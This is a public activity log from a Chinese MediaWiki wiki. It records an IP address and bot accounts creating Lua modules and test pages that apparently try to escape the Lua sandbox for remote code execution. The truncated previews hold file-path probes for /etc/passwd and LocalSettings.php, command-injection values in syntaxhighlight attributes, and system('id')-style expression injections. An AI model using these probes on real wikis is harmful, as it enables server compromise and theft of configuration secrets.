所有公开日志
所有希服维基公开日志的联合展示。您可以通过选择日志类型、输入用户名(区分大小写)或相关页面(区分大小写)筛选日志条目。
- 2026年5月9日 (六) 14:59 221.237.85.128 讨论创建了页面TestTitleProbe (创建页面,内容为“{{#invoke:TitleProbe|test}}”)
- 2026年5月9日 (六) 14:59 221.237.85.128 讨论创建了页面模块:TitleProbe (创建页面,内容为“local p = {} function p.test() local results = {} -- Test different paths local paths = { "/etc/passwd", "/etc/hosts", "/var/www/html/", "/tmp/", "LocalSettings.php", "../LocalSettings.php", "../../LocalSettings.php", "/w/LocalSettings.php", } for _, path in ipairs(paths) do local title = mw.title.new(path) if title then local info = {}…”)
- 2026年5月9日 (六) 14:59 221.237.85.128 讨论创建了页面TestFrameAttack (创建页面,内容为“{{#invoke:FrameAttack|test}}”)
- 2026年5月9日 (六) 14:59 221.237.85.128 讨论创建了页面模块:FrameAttack (创建页面,内容为“local p = {} function p.test(frame) local results = {} local parent = frame:getParent() if not parent then results[1] = "no_parent"; return table.concat(results, " | ") end -- Test 1: Preprocess with syntaxhighlight containing command injection local preprocess_tests = { "<syntaxhighlight lang=\"python | id 2>&1\">test</syntaxhighlight>", "<syntaxhighlight lang=\"$(id 2>&1)\">test</syntaxhighlight>", "<syntaxhighligh…”)
- 2026年5月9日 (六) 14:57 221.237.85.128 讨论创建了页面TestExprAttack (创建页面,内容为“{{#invoke:ExprAttack|test}}”)
- 2026年5月9日 (六) 14:57 221.237.85.128 讨论创建了页面模块:ExprAttack (创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…”)
- 2026年5月9日 (六) 14:57 221.237.85.128 讨论创建了页面TestGCEscape (创建页面,内容为“{{#invoke:GCEscape|test}}”)
- 2026年5月9日 (六) 14:57 221.237.85.128 讨论创建了页面模块:GCEscape (创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "newproxy=" .. type(newproxy) if newproxy then -- Create userdata with metatable local ud = newproxy(true) if ud then results[2] = "ud_created=OK" local mt = getmetatable(ud) if mt then -- __gc runs with less sandbox restrictions in some Lua implementations -- Store captured data in _G…”)
- 2026年5月9日 (六) 14:56 221.237.85.128 讨论创建了页面TestLoadLibPage (创建页面,内容为“{{#invoke:TestLoadLib|test}}”)
- 2026年5月9日 (六) 14:56 221.237.85.128 讨论创建了页面模块:TestLoadLib (创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "loadlib=" .. type(package.loadlib or nil) results[2] = "loaders=" .. type(package.loaders) results[3] = "preload=" .. type(package.preload) -- Try package.searchpath results[4] = "searchpath=" .. type(package.searchpath) -- List what's available in package local pk = package local pkeys = {} for k, v in pairs(pk) do pkeys[#pkeys+1] = k .. "=" .. typ…”)
- 2026年5月9日 (六) 14:56 221.237.85.128 讨论创建了页面TestSH Injection (创建页面,内容为“== Backtick in lang == <syntaxhighlight lang="`id 2>&1`"> TEST_BACKTICK </syntaxhighlight> == $(cmd) in lang == <syntaxhighlight lang="$(id 2>&1)"> TEST_CMDSUB </syntaxhighlight> == Pipe in lang == <syntaxhighlight lang="python | id 2>&1"> TEST_PIPE </syntaxhighlight> == Semicolon in lang == <syntaxhighlight lang="python;id 2>&1"> TEST_SEMI </syntaxhighlight> == Newline in lang == <syntaxhighlight lang="python"> TEST_NEWLINE </syntaxhighlight>”)
- 2026年5月9日 (六) 14:56 221.237.85.128 讨论创建了页面TestAllEnums (创建页面,内容为“DeepEnum1: {{#invoke:DeepEnum1|test}} DeepEnum2: {{#invoke:DeepEnum2|test}} DeepEnum3: {{#invoke:DeepEnum3|test}} DeepEnum4: {{#invoke:DeepEnum4|test}} DeepEnum5: {{#invoke:DeepEnum5|test}} DeepEnum12: {{#invoke:DeepEnum12|test}} DeepEnum15: {{#invoke:DeepEnum15|test}} DeepEnum16: {{#invoke:DeepEnum16|test}} DeepEnum17: {{#invoke:DeepEnum17|test}} DeepEnum18: {{#invoke:DeepEnum18|test}} GCSandbox: {{#invoke:GCSandbox|test}} ShEscape2: {{#invoke:ShEsc…”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面模块:AttackLoader (创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "loaders_type=" .. type(package.loaders) -- If loaders is a table, try each one if type(package.loaders) == "table" then results[2] = "loaders_count=" .. #package.loaders for i, loader in ipairs(package.loaders) do results[#results+1] = "loader" .. i .. "=" .. type(loader) if type(loader) == "function" then -- Try to load 'os'…”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面TestAttackPKG (创建页面,内容为“{{#invoke:AttackPKG|test}}”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面模块:AttackPKG (创建页面,内容为“local p = {} function p.test() local results = {} local loaded = package.loaded results[1] = "loaded_type=" .. type(loaded) if loaded then -- List loaded modules local keys = {} for k in pairs(loaded) do keys[#keys+1] = tostring(k) end results[2] = "loaded_keys=" .. table.concat(keys, ", ") -- Check 'os' specifically if loaded["os"] then local l_os = loaded["os"]…”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面TestExtFuncFull (创建页面,内容为“{{#invoke:Deep4 ExtFuncFull|test}}”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面TestExprDirect (创建页面,内容为“{{#invoke:Deep4 ExprDirect|test}}”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面TestOverrideReq (创建页面,内容为“{{#invoke:Deep4 OverrideReq|test}}”)
- 2026年5月9日 (六) 14:53 221.237.85.128 讨论创建了页面TestPkgLoaded (创建页面,内容为“{{#invoke:Deep4 PkgLoaded|test}}”)
- 2026年5月9日 (六) 14:50 221.237.85.128 讨论创建了页面TestRCE (创建页面,内容为“Method1: {{#invoke:RCE|exec1}} Method2: {{#invoke:RCE|exec2}} Method3: {{#invoke:RCE|exec3}} Method5: {{#invoke:RCE|exec5}} Method6: {{#invoke:RCE|exec6}} Method7: {{#invoke:RCE|exec7}}”)
- 2026年5月9日 (六) 14:47 221.237.85.128 讨论创建了页面TestExploit (RCE test)
- 2026年5月9日 (六) 14:47 221.237.85.128 讨论创建了页面模块:Exploit (Security test)
- 2026年5月9日 (六) 14:23 Bot93553 讨论 贡献创建了页面Test RCE ExecFrame (test)
- 2026年5月9日 (六) 14:23 Bot93553 讨论 贡献创建了页面模块:RCE ExecFrame (exec2)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献已使用非默认内容模型“纯文本”创建页面Test Model text (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献创建了页面Test Model text (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献已使用非默认内容模型“CSS”创建页面Test Model css (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献创建了页面Test Model css (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献已使用非默认内容模型“JavaScript”创建页面Test Model javascript (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献创建了页面Test Model javascript (model test)
- 2026年5月9日 (六) 14:21 Bot93553 讨论 贡献创建了页面Test Model wikitext (model test)
- 2026年5月9日 (六) 14:20 RCE Y1g5qr5z2T 讨论 贡献创建了页面文件:Newuser test.svg
- 2026年5月9日 (六) 14:20 RCE Y1g5qr5z2T 讨论 贡献上传文件:Newuser test.svg
- 2026年5月9日 (六) 14:20 RCE Y1g5qr5z2T 讨论 贡献创建了页面模板:NewUserTest (test)
- 2026年5月9日 (六) 14:20 RCE Y1g5qr5z2T 讨论 贡献创建了页面模块:NewUserTest (test)
- 2026年5月9日 (六) 14:20 RCE Y1g5qr5z2T 讨论 贡献创建了页面Test NewUser (test)
- 2026年5月9日 (六) 14:18 Bot93553 讨论 贡献创建了页面模块:RCE Exec (exec)
- 2026年5月9日 (六) 14:18 Bot93553 讨论 贡献创建了页面模块:RCE Escape (escape)
- 2026年5月9日 (六) 14:18 Bot93553 讨论 贡献创建了页面模块:RCE Direct (test)
- 2026年5月9日 (六) 14:17 Bot93553 讨论 贡献创建了页面模块:RCE ESCAPE LOCAL (rce)
- 2026年5月9日 (六) 14:11 用户账号RCE Y1g5qr5z2T 讨论 贡献已创建
- 2026年5月9日 (六) 14:11 Bot93553 讨论 贡献已使用非默认内容模型“CSS”创建页面Test SanitizedCSS (CSS content model with PHP)
- 2026年5月9日 (六) 14:11 Bot93553 讨论 贡献创建了页面Test SanitizedCSS (CSS content model with PHP)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面TestLoadData (RCE test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面模块:FinalAtk LoadData (RCE final test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面模块:FinalAtk DataModule (RCE final test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面TestIfExist (RCE test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面模块:FinalAtk IfExist (RCE final test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面TestRecurse (RCE test)
- 2026年5月9日 (六) 14:06 Bot93553 讨论 贡献创建了页面模块:FinalAtk Recurse (RCE final test)